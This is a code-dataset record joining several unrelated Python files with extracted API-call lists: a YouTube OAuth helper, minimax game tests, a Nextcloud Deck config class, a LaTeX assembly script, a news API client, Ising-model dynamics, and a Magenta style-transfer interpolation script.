self.case_first_time_new_secrets = first_time and new_client_secrets
self.case_already_stored = not first_time and bool(channel_id)
assert self.case_first_time_reuse_secrets or self.case_first_time_new_secrets or self.case_already_stored, "You are not initializing the inputs correctly"
self.scopes = ["https://www.googleapis.com/auth/youtube.readonly"]
self.api_service_name = 'youtube'
self.api_version = 'v3'
self.first_time = first_time
self.new_client_secrets = new_client_secrets
self.channel_id_secrets = channel_id_secrets
self.channel_id = channel_id
self.client_secrets_file = self._define_client_secrets_file()
if self.first_time:
self._get_authenticated_first_time()
self._move_client_secrets_file()
else:
self._get_authenticated_from_file()
def _define_client_secrets_file(self):
if self.case_first_time_reuse_secrets:
return f'{FOLDER_CHANNELS}/{self.channel_id_secrets}/client_secrets.json'
elif self.case_first_time_new_secrets:
return f'{FOLDER_CHANNELS}/new_channel/client_secrets.json'
elif self.case_already_stored:
return f'{FOLDER_CHANNELS}/{self.channel_id}/client_secrets.json'
def _get_authenticated_first_time(self):
# Ask for authorization
flow = InstalledAppFlow.from_client_secrets_file(self.client_secrets_file,
self.scopes)
# Get the credentials
self.credentials = flow.run_local_server(port=8080, open_browser=True)
# Make the Youtube object
self._make_youtube_object()
        # Get the channel id, which names the folder the credentials are saved in
request = self.youtube.channels().list(
part='snippet',
mine='True'
)
response = request.execute()
self.channel_id = response['items'][0]['id']
# Create a new folder for the channel
Path(f'{FOLDER_CHANNELS}/{self.channel_id}').mkdir(parents=True, exist_ok=True)
# Save the OAuth credentials in a file called OAUTH_CREDENTIALS
self.oauth_credentials_file = f'{FOLDER_CHANNELS}/{self.channel_id}/OAUTH_CREDENTIALS'
with open(self.oauth_credentials_file, 'wb') as f:
pickle.dump(self.credentials, f)
def _move_client_secrets_file(self):
new_destination = f'{FOLDER_CHANNELS}/{self.channel_id}/client_secrets.json'
# In this case we move the file
if self.case_first_time_new_secrets:
os.rename(self.client_secrets_file, new_destination)
# In this case we copy the file
elif self.case_first_time_reuse_secrets:
copyfile(self.client_secrets_file, new_destination)
# Redefine the new location
self.client_secrets_file = new_destination
def _get_authenticated_from_file(self):
self.oauth_credentials_file = f'{FOLDER_CHANNELS}/{self.channel_id}/OAUTH_CREDENTIALS'
with open(self.oauth_credentials_file, 'rb') as f:
self.credentials = pickle.load(f)
self._make_youtube_object()
def _make_youtube_object(self):
self.youtube = build(self.api_service_name,
self.api_version,
credentials=self.credentials)
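# Minimal usage sketch (illustrative only; requires a real client_secrets.json):
# auth = Authentication(first_time=True, new_client_secrets=True)
# request = auth.youtube.channels().list(part='snippet', mine=True)
# print(request.execute())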
|
[
"pickle.dump",
"os.rename",
"pathlib.Path",
"pickle.load",
"shutil.copyfile",
"google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file",
"googleapiclient.discovery.build"
] |
[((2064, 2149), 'google_auth_oauthlib.flow.InstalledAppFlow.from_client_secrets_file', 'InstalledAppFlow.from_client_secrets_file', (['self.client_secrets_file', 'self.scopes'], {}), '(self.client_secrets_file, self.scopes\n )\n', (2105, 2149), False, 'from google_auth_oauthlib.flow import InstalledAppFlow\n'), ((3929, 4005), 'googleapiclient.discovery.build', 'build', (['self.api_service_name', 'self.api_version'], {'credentials': 'self.credentials'}), '(self.api_service_name, self.api_version, credentials=self.credentials)\n', (3934, 4005), False, 'from googleapiclient.discovery import build\n'), ((3031, 3063), 'pickle.dump', 'pickle.dump', (['self.credentials', 'f'], {}), '(self.credentials, f)\n', (3042, 3063), False, 'import pickle\n'), ((3290, 3342), 'os.rename', 'os.rename', (['self.client_secrets_file', 'new_destination'], {}), '(self.client_secrets_file, new_destination)\n', (3299, 3342), False, 'import os\n'), ((3817, 3831), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (3828, 3831), False, 'import pickle\n'), ((2711, 2755), 'pathlib.Path', 'Path', (['f"""{FOLDER_CHANNELS}/{self.channel_id}"""'], {}), "(f'{FOLDER_CHANNELS}/{self.channel_id}')\n", (2715, 2755), False, 'from pathlib import Path\n'), ((3445, 3496), 'shutil.copyfile', 'copyfile', (['self.client_secrets_file', 'new_destination'], {}), '(self.client_secrets_file, new_destination)\n', (3453, 3496), False, 'from shutil import copyfile\n')]
|
"""
Tests for Minimax algorithm
"""
import math
from pyai.search.minimax import (
minimax,
init_game,
to_string,
)
def setup_game():
"""Set up a game for tests."""
red_discs = {
(0, 1),
(1, 0),
(1, 1),
(1, 3),
(2, 3),
(3, 0),
(3, 1),
(3, 2),
(3, 4),
(4, 2),
(4, 3),
(5, 0),
(5, 4),
}
yellow_discs = {
(0, 0),
(0, 2),
(0, 3),
(1, 2),
(2, 0),
(2, 1),
(2, 2),
(3, 3),
(4, 0),
(4, 1),
(4, 4),
(5, 1),
(5, 2),
(5, 3),
}
return init_game(
n_rows=6, n_columns=7, red_discs=red_discs, yellow_discs=yellow_discs
)
def test_minimax():
"""Test Minimax without alpha-beta pruning"""
game = setup_game()
print("Starting position:")
print(to_string(game))
# Search for best move for red player (maximizer), looking 2 plays ahead
# Alpha-beta pruning is disabled
score, next_position, total_evaluated_positions, _, _ = minimax(
game, 2, True, None, None
)
# Best move for red is at (5,5) to prevent a win for yellow
assert score == -2
assert next_position[5][5] == "R"
# No pruning: all valid positions are evaluated
assert total_evaluated_positions == 9
print(f"Best score: {score} ({total_evaluated_positions} evaluated position(s))")
print("Next position:")
print(to_string(next_position))
def test_minimax_alphabeta():
"""Test Minimax with alpha-beta pruning"""
game = setup_game()
print("Starting position:")
print(to_string(game))
# Search for best move for red player (maximizer), looking 2 plays ahead
# Alpha-beta pruning is enabled
score, next_position, total_evaluated_positions, _, _ = minimax(
game,
2,
True,
-math.inf, # Init alpha and beta with worst possible values
math.inf,
)
# Best move for red is at (5,5) to prevent a win for yellow
assert score == -2
assert next_position[5][5] == "R"
# The last position (in left to right order) should not be evaluated
assert total_evaluated_positions == 8
print(f"Best score: {score} ({total_evaluated_positions} evaluated position(s))")
print("Next position:")
print(to_string(next_position))
def test_minimax_win():
"""Test Minimax with a winning solution"""
game = setup_game()
print("Starting position:")
print(to_string(game))
# Search for best move for yellow player (minimizer), looking 2 plays ahead
# Alpha-beta pruning is enabled
score, next_position, total_evaluated_positions, _, _ = minimax(
game,
2,
False,
-math.inf, # Init alpha and beta with worst possible values
math.inf,
)
# Best move for yellow is at (5,5) which is a win
assert score == -100
assert next_position[5][5] == "Y"
    # One yellow move is a direct win, so three fewer positions are evaluated
# No pruning this time
assert total_evaluated_positions == 7
print(f"Best score: {score} ({total_evaluated_positions} evaluated position(s))")
print("Next position:")
print(to_string(next_position))
|
[
"pyai.search.minimax.minimax",
"pyai.search.minimax.init_game",
"pyai.search.minimax.to_string"
] |
[((679, 764), 'pyai.search.minimax.init_game', 'init_game', ([], {'n_rows': '(6)', 'n_columns': '(7)', 'red_discs': 'red_discs', 'yellow_discs': 'yellow_discs'}), '(n_rows=6, n_columns=7, red_discs=red_discs, yellow_discs=yellow_discs\n )\n', (688, 764), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((1105, 1139), 'pyai.search.minimax.minimax', 'minimax', (['game', '(2)', '(True)', 'None', 'None'], {}), '(game, 2, True, None, None)\n', (1112, 1139), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((1861, 1904), 'pyai.search.minimax.minimax', 'minimax', (['game', '(2)', '(True)', '(-math.inf)', 'math.inf'], {}), '(game, 2, True, -math.inf, math.inf)\n', (1868, 1904), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((2727, 2771), 'pyai.search.minimax.minimax', 'minimax', (['game', '(2)', '(False)', '(-math.inf)', 'math.inf'], {}), '(game, 2, False, -math.inf, math.inf)\n', (2734, 2771), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((913, 928), 'pyai.search.minimax.to_string', 'to_string', (['game'], {}), '(game)\n', (922, 928), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((1498, 1522), 'pyai.search.minimax.to_string', 'to_string', (['next_position'], {}), '(next_position)\n', (1507, 1522), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((1670, 1685), 'pyai.search.minimax.to_string', 'to_string', (['game'], {}), '(game)\n', (1679, 1685), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((2367, 2391), 'pyai.search.minimax.to_string', 'to_string', (['next_position'], {}), '(next_position)\n', (2376, 2391), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((2533, 2548), 'pyai.search.minimax.to_string', 'to_string', (['game'], {}), '(game)\n', (2542, 2548), False, 'from pyai.search.minimax import minimax, init_game, to_string\n'), ((3253, 3277), 'pyai.search.minimax.to_string', 'to_string', (['next_position'], {}), '(next_position)\n', (3262, 3277), False, 'from pyai.search.minimax import minimax, init_game, to_string\n')]
|
"""
Module handles all the configuration stuff.
"""
from dataclasses import dataclass, field
from typing import List, ClassVar, Type
from marshmallow import Schema
import marshmallow_dataclass
import yaml
@dataclass
class Config:
"""Config describes the configuration-file for the CLI application."""
url: str = field(
metadata=dict(
description="Nextcloud URL",
default="nc.example.com")
)
user: str = field(
metadata=dict(
description="Nextcloud user",
default="usr")
)
password: str = field(
metadata=dict(
description="Nextcloud password",
default="<PASSWORD>")
)
ignore_board: List[str] = field(
metadata=dict(
description="Name of boards to be ignored",
default=["Personal"])
)
backlog_stacks: List[str] = field(
metadata=dict(
description="Name of stacks considered to be a backlog",
default=["Backlog"])
)
progress_stacks: List[str] = field(
metadata=dict(
description="Stacks containing tasks in the progress",
default=["In Progress"])
)
done_stacks: List[str] = field(
metadata=dict(
description="Stacks containing done tasks",
default=["Done"])
)
# mail_cache_path: str = field(
# metadata=dict(
# description="Path to mail-address cache",
# default="deck-cache.yaml",
# )
# )
timezone: str = field(
metadata=dict(
description="Timezone",
default="Europe/Berlin",
)
)
Schema: ClassVar[Type[Schema]] = Schema
@classmethod
def from_yaml(cls, raw: str) -> 'Config':
"""Loads the configuration from a given YAML string."""
schema = marshmallow_dataclass.class_schema(Config)()
data = yaml.load(raw, Loader=yaml.FullLoader)
return schema.load(data)
@classmethod
def defaults(cls) -> 'Config':
"""Returns a new instance of the Config with the default values."""
return Config(
url="nc.example.com",
user="usr",
password="<PASSWORD>",
ignore_board=["Personal"],
backlog_stacks=["Backlog"],
progress_stacks=["In Progress"],
done_stacks=["Done"],
# mail_cache_path="check-cache.yaml",
timezone="Europe/Berlin",
)
def to_yaml(self) -> str:
"""Returns the config data-class as a YAML string."""
schema = marshmallow_dataclass.class_schema(Config)()
cfg = schema.dump(self)
return yaml.dump(cfg)
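# Round-trip sketch (assumes the defaults stay schema-valid):
# cfg = Config.defaults()
# assert Config.from_yaml(cfg.to_yaml()) == cfg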
|
[
"marshmallow_dataclass.class_schema",
"yaml.load",
"yaml.dump"
] |
[((1903, 1941), 'yaml.load', 'yaml.load', (['raw'], {'Loader': 'yaml.FullLoader'}), '(raw, Loader=yaml.FullLoader)\n', (1912, 1941), False, 'import yaml\n'), ((2678, 2692), 'yaml.dump', 'yaml.dump', (['cfg'], {}), '(cfg)\n', (2687, 2692), False, 'import yaml\n'), ((1843, 1885), 'marshmallow_dataclass.class_schema', 'marshmallow_dataclass.class_schema', (['Config'], {}), '(Config)\n', (1877, 1885), False, 'import marshmallow_dataclass\n'), ((2586, 2628), 'marshmallow_dataclass.class_schema', 'marshmallow_dataclass.class_schema', (['Config'], {}), '(Config)\n', (2620, 2628), False, 'import marshmallow_dataclass\n')]
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
'''
This script assembles a standalone LaTeX file with bibliography and list of
figures incorporated into the main document (JASA requires single standalone
documents for article submission). It also replaces proper unicode en-dashes
(–) with LaTeX-style double-hyphens (--) and smart double quotes with LaTeX-
style `` and ''. Pandoc has already done this in the main document (which
propagates to the list of figures), so we only modify the bibliography here.
'''
import sys
import os.path as op
infile = sys.argv[-2]
outfile = sys.argv[-1]
bibliography = op.splitext(infile)[0] + '.bbl'
listoffigs = op.splitext(infile)[0] + '.lof'
figs = ''.join(open(listoffigs).readlines())
bib = ''.join(open(bibliography).readlines())
bib = bib.replace('–', '--')
bib = bib.replace('“', '``')
bib = bib.replace('”', '\'\'')
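# Stream the main .tex file, splicing the processed .bbl in place of the
# \bibliography command and the .lof contents in place of \listoffigures.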
with open(infile, 'r') as f, open(outfile, 'w') as g:
for line in f:
if '\\bibliography{' in line:
line = bib
if '\\listoffigures' in line:
g.write('\\section*{List of figures}\n')
line = figs
g.write(line)
|
[
"os.path.splitext"
] |
[((606, 625), 'os.path.splitext', 'op.splitext', (['infile'], {}), '(infile)\n', (617, 625), True, 'import os.path as op\n'), ((651, 670), 'os.path.splitext', 'op.splitext', (['infile'], {}), '(infile)\n', (662, 670), True, 'import os.path as op\n')]
|
import urllib.request,json
from .models import Article, Source
# Getting api key
api_key = None
# Getting the base and sources url
base_url = None
sources_url = None
def configure_request(app):
global api_key,base_url,sources_url
api_key = app.config['NEWS_API_KEY']
base_url = app.config['NEWS_API_BASE_URL']
sources_url = app.config['NEWS_API_SOURCES_URL']
def get_news(article,q,e):
'''
Function that gets the json response to our url request
'''
get_news_url = base_url.format(article,q,e,api_key)
with urllib.request.urlopen(get_news_url) as url:
get_news_data = url.read()
get_news_response = json.loads(get_news_data)
    news_results = None  # replaceable with []
if get_news_response['articles']:
news_results_list = get_news_response['articles']
news_results = process_articles(news_results_list)
return news_results
def get_sources(category):
'''
Function that gets the json response to our url request
'''
get_sources_url = sources_url.format(category,api_key)
with urllib.request.urlopen(get_sources_url) as url:
get_sources_data = url.read()
get_sources_response = json.loads(get_sources_data)
    sources_results = None  # replaceable with []
if get_sources_response['sources']:
sources_results_list = get_sources_response['sources']
sources_results = process_sources(sources_results_list)
return sources_results
def process_articles(news_list): #articles_url
'''
    Function that processes the news results and transforms them into a list of objects
    Args:
        news_list: A list of dictionaries that contain news details
    Returns:
        news_results: A list of news objects
'''
news_results = []
for news_item in news_list:
title = news_item.get('title')
author = news_item.get('author')
description = news_item.get('description')
url = news_item.get('url')
poster = news_item.get('urlToImage')
publishedAt = news_item.get('publishedAt')
content = news_item.get('content')
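        # Only keep articles that ship a preview image, so every Article
        # object can be rendered with a poster.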
if poster:
news_object = Article(title,author,description,url,poster,publishedAt,content)
news_results.append(news_object)
return news_results
def process_sources(sources_list): #sources_url
'''
    Function that processes the sources results and transforms them into a list of objects
    Args:
        sources_list: A list of dictionaries that contain source details
    Returns:
        sources_results: A list of source objects
'''
sources_results = []
for source_item in sources_list:
id = source_item.get('id')
name = source_item.get('name')
description = source_item.get('description')
url = source_item.get('url')
category = source_item.get('category')
country = source_item.get('country')
source_object = Source(id,name,description,url,category,country)
sources_results.append(source_object)
return sources_results
|
[
"json.loads"
] |
[((657, 682), 'json.loads', 'json.loads', (['get_news_data'], {}), '(get_news_data)\n', (667, 682), False, 'import urllib.request, json\n'), ((1218, 1246), 'json.loads', 'json.loads', (['get_sources_data'], {}), '(get_sources_data)\n', (1228, 1246), False, 'import urllib.request, json\n')]
|
import numpy as np
from functools import reduce  # reduce is not a builtin in Python 3
from random import random
from noneq_settings import BETA
def hamming(s1, s2):
"""Calculate the Hamming distance between two bit lists"""
assert len(s1) == len(s2)
return sum(c1 != c2 for c1, c2 in zip(s1, s2))
def hamiltonian(state_vec, intxn_matrix):
return -0.5 * reduce(np.dot, [state_vec.T, intxn_matrix, state_vec]) # plus some other field terms... do we care for these? ie. "-sum h_i*s_i"
def internal_field(state, spin_idx, t, intxn_matrix):
internal_field = np.dot(intxn_matrix[spin_idx,:], state[:,t])
return internal_field
def glauber_dynamics_update(state, spin_idx, t, intxn_matrix, app_field=None, beta=BETA):
r1 = random()
total_field = internal_field(state, spin_idx, t, intxn_matrix)
if app_field is not None:
total_field += app_field[spin_idx]
prob_on_after_timestep = 1 / (1 + np.exp(-2*beta*total_field)) # probability that site i will be "up" after the timestep
#prob_on_after_timestep = 1 / (1 + np.exp(-BETA*total_field)) # (note remove factor of 2 because h = 0.5*J*s) probability that site i will be "up" after the timestep
if prob_on_after_timestep > r1:
#state[spin_idx, t + 1] = 1.0
state[spin_idx, t] = 1.0
else:
#state[spin_idx, t + 1] = -1.0
state[spin_idx, t] = -1.0
return state
def state_to_label(state):
# Idea: assign integer label (0 to 2^N - 1) to the state
# state acts like binary representation of integers
# "0" corresponds to all -1
# 2^N - 1 corresponds to all +1
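    # e.g. N=3: state (-1, -1, +1) -> bits 001 -> label 1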
label = 0
bitlist = (1+np.array(state, dtype=int))/2
for bit in bitlist:
label = (label << 1) | bit
return label
def label_to_state(label, N, use_neg=True):
# n is the integer label of a set of spins
bitlist = [1 if digit=='1' else 0 for digit in bin(label)[2:]]
if len(bitlist) < N:
tmp = bitlist
bitlist = np.zeros(N, dtype=int)
bitlist[-len(tmp):] = tmp[:]
if use_neg:
state = np.array(bitlist)*2 - 1
else:
state = np.array(bitlist)
return state
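# Worked example (illustrative check of the labeling convention above):
#   state_to_label([-1, 1, 1])  ->  bits 011  ->  label 3
#   label_to_state(3, 3)        ->  array([-1,  1,  1])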
def get_adjacent_labels(state):
# TODO slow, how to speedup with permutation?
N = len(state)
labels = [0] * N
tmp = np.zeros(N, dtype=int)
for i in xrange(N):
tmp[:] = state[:]
tmp[i] = -1 * state[i]
labels[i] = state_to_label(tmp)
return labels
|
[
"numpy.zeros",
"random.random",
"numpy.array",
"numpy.exp",
"numpy.dot"
] |
[((514, 560), 'numpy.dot', 'np.dot', (['intxn_matrix[spin_idx, :]', 'state[:, t]'], {}), '(intxn_matrix[spin_idx, :], state[:, t])\n', (520, 560), True, 'import numpy as np\n'), ((686, 694), 'random.random', 'random', ([], {}), '()\n', (692, 694), False, 'from random import random\n'), ((2226, 2248), 'numpy.zeros', 'np.zeros', (['N'], {'dtype': 'int'}), '(N, dtype=int)\n', (2234, 2248), True, 'import numpy as np\n'), ((1915, 1937), 'numpy.zeros', 'np.zeros', (['N'], {'dtype': 'int'}), '(N, dtype=int)\n', (1923, 1937), True, 'import numpy as np\n'), ((2057, 2074), 'numpy.array', 'np.array', (['bitlist'], {}), '(bitlist)\n', (2065, 2074), True, 'import numpy as np\n'), ((873, 904), 'numpy.exp', 'np.exp', (['(-2 * beta * total_field)'], {}), '(-2 * beta * total_field)\n', (879, 904), True, 'import numpy as np\n'), ((1584, 1610), 'numpy.array', 'np.array', (['state'], {'dtype': 'int'}), '(state, dtype=int)\n', (1592, 1610), True, 'import numpy as np\n'), ((2007, 2024), 'numpy.array', 'np.array', (['bitlist'], {}), '(bitlist)\n', (2015, 2024), True, 'import numpy as np\n')]
|
# Copyright 2020 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generates stylized images with different strengths of a stylization.
For each pair of the content and style images this script computes stylized
images with different strengths of stylization (interpolates between the
identity transform parameters and the style parameters for the style image) and
saves them to the given output_dir.
See run_interpolation_with_identity.sh for example usage.
"""
import ast
import os
from magenta.models.arbitrary_image_stylization import arbitrary_image_stylization_build_model as build_model
from magenta.models.image_stylization import image_utils
import numpy as np
import tensorflow.compat.v1 as tf
import tf_slim as slim
flags = tf.flags
flags.DEFINE_string('checkpoint', None, 'Path to the model checkpoint.')
flags.DEFINE_string('style_images_paths', None, 'Paths to the style images '
'for evaluation.')
flags.DEFINE_string('content_images_paths', None, 'Paths to the content images '
'for evaluation.')
flags.DEFINE_string('output_dir', None, 'Output directory.')
flags.DEFINE_integer('image_size', 256, 'Image size.')
flags.DEFINE_boolean('content_square_crop', False, 'Whether to center crop '
'the content image to be a square or not.')
flags.DEFINE_integer('style_image_size', 256, 'Style image size.')
flags.DEFINE_boolean('style_square_crop', False, 'Whether to center crop '
'the style image to be a square or not.')
flags.DEFINE_integer('maximum_styles_to_evaluate', 1024, 'Maximum number of '
'styles to evaluate.')
flags.DEFINE_string('interpolation_weights', '[1.0]', 'List of weights '
                    'for interpolation between the parameters of the identity '
                    'transform and the style parameters of the style image. '
                    'The larger the weight, the stronger the stylization. '
                    'A weight of 1.0 means the normal style transfer and a '
                    'weight of 0.0 means the identity transform.')
FLAGS = flags.FLAGS
def main(unused_argv=None):
tf.logging.set_verbosity(tf.logging.INFO)
if not tf.gfile.Exists(FLAGS.output_dir):
tf.gfile.MkDir(FLAGS.output_dir)
with tf.Graph().as_default(), tf.Session() as sess:
# Defines place holder for the style image.
style_img_ph = tf.placeholder(tf.float32, shape=[None, None, 3])
if FLAGS.style_square_crop:
style_img_preprocessed = image_utils.center_crop_resize_image(
style_img_ph, FLAGS.style_image_size)
else:
style_img_preprocessed = image_utils.resize_image(style_img_ph,
FLAGS.style_image_size)
# Defines place holder for the content image.
content_img_ph = tf.placeholder(tf.float32, shape=[None, None, 3])
if FLAGS.content_square_crop:
content_img_preprocessed = image_utils.center_crop_resize_image(
content_img_ph, FLAGS.image_size)
else:
content_img_preprocessed = image_utils.resize_image(
content_img_ph, FLAGS.image_size)
# Defines the model.
stylized_images, _, _, bottleneck_feat = build_model.build_model(
content_img_preprocessed,
style_img_preprocessed,
trainable=False,
is_training=False,
inception_end_point='Mixed_6e',
style_prediction_bottleneck=100,
adds_losses=False)
if tf.gfile.IsDirectory(FLAGS.checkpoint):
checkpoint = tf.train.latest_checkpoint(FLAGS.checkpoint)
else:
checkpoint = FLAGS.checkpoint
tf.logging.info('loading latest checkpoint file: {}'.format(checkpoint))
init_fn = slim.assign_from_checkpoint_fn(checkpoint,
slim.get_variables_to_restore())
sess.run([tf.local_variables_initializer()])
init_fn(sess)
# Gets the list of the input style images.
style_img_list = tf.gfile.Glob(FLAGS.style_images_paths)
if len(style_img_list) > FLAGS.maximum_styles_to_evaluate:
np.random.seed(1234)
style_img_list = np.random.permutation(style_img_list)
style_img_list = style_img_list[:FLAGS.maximum_styles_to_evaluate]
# Gets list of input content images.
content_img_list = tf.gfile.Glob(FLAGS.content_images_paths)
for content_i, content_img_path in enumerate(content_img_list):
content_img_np = image_utils.load_np_image_uint8(content_img_path)[:, :, :
3]
content_img_name = os.path.basename(content_img_path)[:-4]
# Saves preprocessed content image.
inp_img_croped_resized_np = sess.run(
content_img_preprocessed, feed_dict={
content_img_ph: content_img_np
})
image_utils.save_np_image(inp_img_croped_resized_np,
os.path.join(FLAGS.output_dir,
'%s.jpg' % (content_img_name)))
# Computes bottleneck features of the style prediction network for the
# identity transform.
identity_params = sess.run(
bottleneck_feat, feed_dict={style_img_ph: content_img_np})
for style_i, style_img_path in enumerate(style_img_list):
if style_i > FLAGS.maximum_styles_to_evaluate:
break
style_img_name = os.path.basename(style_img_path)[:-4]
style_image_np = image_utils.load_np_image_uint8(style_img_path)[:, :, :
3]
if style_i % 10 == 0:
tf.logging.info('Stylizing (%d) %s with (%d) %s' %
(content_i, content_img_name, style_i,
style_img_name))
# Saves preprocessed style image.
style_img_croped_resized_np = sess.run(
style_img_preprocessed, feed_dict={
style_img_ph: style_image_np
})
image_utils.save_np_image(style_img_croped_resized_np,
os.path.join(FLAGS.output_dir,
'%s.jpg' % (style_img_name)))
# Computes bottleneck features of the style prediction network for the
# given style image.
style_params = sess.run(
bottleneck_feat, feed_dict={style_img_ph: style_image_np})
interpolation_weights = ast.literal_eval(FLAGS.interpolation_weights)
# Interpolates between the parameters of the identity transform and
# style parameters of the given style image.
for interp_i, wi in enumerate(interpolation_weights):
stylized_image_res = sess.run(
stylized_images,
feed_dict={
bottleneck_feat:
identity_params * (1 - wi) + style_params * wi,
content_img_ph:
content_img_np
})
# Saves stylized image.
image_utils.save_np_image(
stylized_image_res,
os.path.join(FLAGS.output_dir, '%s_stylized_%s_%d.jpg' %
(content_img_name, style_img_name, interp_i)))
def console_entry_point():
tf.disable_v2_behavior()
tf.app.run(main)
if __name__ == '__main__':
console_entry_point()
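# Example invocation (illustrative; the script name and paths are placeholders,
# while the flag names are the ones defined above):
#   python <this_script>.py \
#     --checkpoint=/path/to/model.ckpt \
#     --style_images_paths='styles/*.jpg' \
#     --content_images_paths='contents/*.jpg' \
#     --output_dir=/tmp/stylized \
#     --interpolation_weights='[0.0, 0.5, 1.0]'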
|
[
"numpy.random.seed",
"magenta.models.arbitrary_image_stylization.arbitrary_image_stylization_build_model.build_model",
"magenta.models.image_stylization.image_utils.load_np_image_uint8",
"tensorflow.compat.v1.gfile.Exists",
"magenta.models.image_stylization.image_utils.resize_image",
"tensorflow.compat.v1.gfile.Glob",
"os.path.join",
"tensorflow.compat.v1.app.run",
"tensorflow.compat.v1.placeholder",
"tensorflow.compat.v1.logging.info",
"tensorflow.compat.v1.Session",
"tensorflow.compat.v1.train.latest_checkpoint",
"os.path.basename",
"tf_slim.get_variables_to_restore",
"numpy.random.permutation",
"tensorflow.compat.v1.gfile.MkDir",
"magenta.models.image_stylization.image_utils.center_crop_resize_image",
"tensorflow.compat.v1.disable_v2_behavior",
"tensorflow.compat.v1.gfile.IsDirectory",
"tensorflow.compat.v1.local_variables_initializer",
"tensorflow.compat.v1.logging.set_verbosity",
"ast.literal_eval",
"tensorflow.compat.v1.Graph"
] |
[((2656, 2697), 'tensorflow.compat.v1.logging.set_verbosity', 'tf.logging.set_verbosity', (['tf.logging.INFO'], {}), '(tf.logging.INFO)\n', (2680, 2697), True, 'import tensorflow.compat.v1 as tf\n'), ((7755, 7779), 'tensorflow.compat.v1.disable_v2_behavior', 'tf.disable_v2_behavior', ([], {}), '()\n', (7777, 7779), True, 'import tensorflow.compat.v1 as tf\n'), ((7782, 7798), 'tensorflow.compat.v1.app.run', 'tf.app.run', (['main'], {}), '(main)\n', (7792, 7798), True, 'import tensorflow.compat.v1 as tf\n'), ((2707, 2740), 'tensorflow.compat.v1.gfile.Exists', 'tf.gfile.Exists', (['FLAGS.output_dir'], {}), '(FLAGS.output_dir)\n', (2722, 2740), True, 'import tensorflow.compat.v1 as tf\n'), ((2746, 2778), 'tensorflow.compat.v1.gfile.MkDir', 'tf.gfile.MkDir', (['FLAGS.output_dir'], {}), '(FLAGS.output_dir)\n', (2760, 2778), True, 'import tensorflow.compat.v1 as tf\n'), ((2812, 2824), 'tensorflow.compat.v1.Session', 'tf.Session', ([], {}), '()\n', (2822, 2824), True, 'import tensorflow.compat.v1 as tf\n'), ((2901, 2950), 'tensorflow.compat.v1.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[None, None, 3]'}), '(tf.float32, shape=[None, None, 3])\n', (2915, 2950), True, 'import tensorflow.compat.v1 as tf\n'), ((3332, 3381), 'tensorflow.compat.v1.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '[None, None, 3]'}), '(tf.float32, shape=[None, None, 3])\n', (3346, 3381), True, 'import tensorflow.compat.v1 as tf\n'), ((3715, 3916), 'magenta.models.arbitrary_image_stylization.arbitrary_image_stylization_build_model.build_model', 'build_model.build_model', (['content_img_preprocessed', 'style_img_preprocessed'], {'trainable': '(False)', 'is_training': '(False)', 'inception_end_point': '"""Mixed_6e"""', 'style_prediction_bottleneck': '(100)', 'adds_losses': '(False)'}), "(content_img_preprocessed, style_img_preprocessed,\n trainable=False, is_training=False, inception_end_point='Mixed_6e',\n style_prediction_bottleneck=100, adds_losses=False)\n", (3738, 3916), True, 'from magenta.models.arbitrary_image_stylization import arbitrary_image_stylization_build_model as build_model\n'), ((3974, 4012), 'tensorflow.compat.v1.gfile.IsDirectory', 'tf.gfile.IsDirectory', (['FLAGS.checkpoint'], {}), '(FLAGS.checkpoint)\n', (3994, 4012), True, 'import tensorflow.compat.v1 as tf\n'), ((4475, 4514), 'tensorflow.compat.v1.gfile.Glob', 'tf.gfile.Glob', (['FLAGS.style_images_paths'], {}), '(FLAGS.style_images_paths)\n', (4488, 4514), True, 'import tensorflow.compat.v1 as tf\n'), ((4804, 4845), 'tensorflow.compat.v1.gfile.Glob', 'tf.gfile.Glob', (['FLAGS.content_images_paths'], {}), '(FLAGS.content_images_paths)\n', (4817, 4845), True, 'import tensorflow.compat.v1 as tf\n'), ((3014, 3088), 'magenta.models.image_stylization.image_utils.center_crop_resize_image', 'image_utils.center_crop_resize_image', (['style_img_ph', 'FLAGS.style_image_size'], {}), '(style_img_ph, FLAGS.style_image_size)\n', (3050, 3088), False, 'from magenta.models.image_stylization import image_utils\n'), ((3141, 3203), 'magenta.models.image_stylization.image_utils.resize_image', 'image_utils.resize_image', (['style_img_ph', 'FLAGS.style_image_size'], {}), '(style_img_ph, FLAGS.style_image_size)\n', (3165, 3203), False, 'from magenta.models.image_stylization import image_utils\n'), ((3449, 3519), 'magenta.models.image_stylization.image_utils.center_crop_resize_image', 'image_utils.center_crop_resize_image', (['content_img_ph', 'FLAGS.image_size'], {}), '(content_img_ph, FLAGS.image_size)\n', (3485, 3519), False, 'from 
